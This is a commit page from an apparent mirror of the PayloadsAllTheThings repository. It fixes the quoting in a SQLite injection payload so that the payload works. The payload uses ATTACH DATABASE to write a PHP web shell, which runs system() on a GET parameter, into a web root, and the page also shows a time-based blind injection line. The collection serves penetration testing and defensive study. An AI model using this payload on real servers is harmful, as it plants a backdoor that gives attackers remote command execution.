mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings
synced 2026-01-02 22:23:37 +01:00
Merge pull request #498 from PinkDraconian/patch-1
Single quotes are messing with the command.
This commit is contained in:
commit
096885e0ad
1 changed files with 1 additions and 1 deletions
|
|
@ -82,7 +82,7 @@ AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
|
|||
```sql
|
||||
ATTACH DATABASE '/var/www/lol.php' AS lol;
|
||||
CREATE TABLE lol.pwn (dataz text);
|
||||
INSERT INTO lol.pwn (dataz) VALUES ('<?php system($_GET['cmd']); ?>');--
|
||||
INSERT INTO lol.pwn (dataz) VALUES ("<?php system($_GET['cmd']); ?>");--
|
||||
```
|
||||
|
||||
## Remote Command Execution using SQLite command - Load_extension
|
||||
|
|
|
|||
Loading…
Reference in a new issue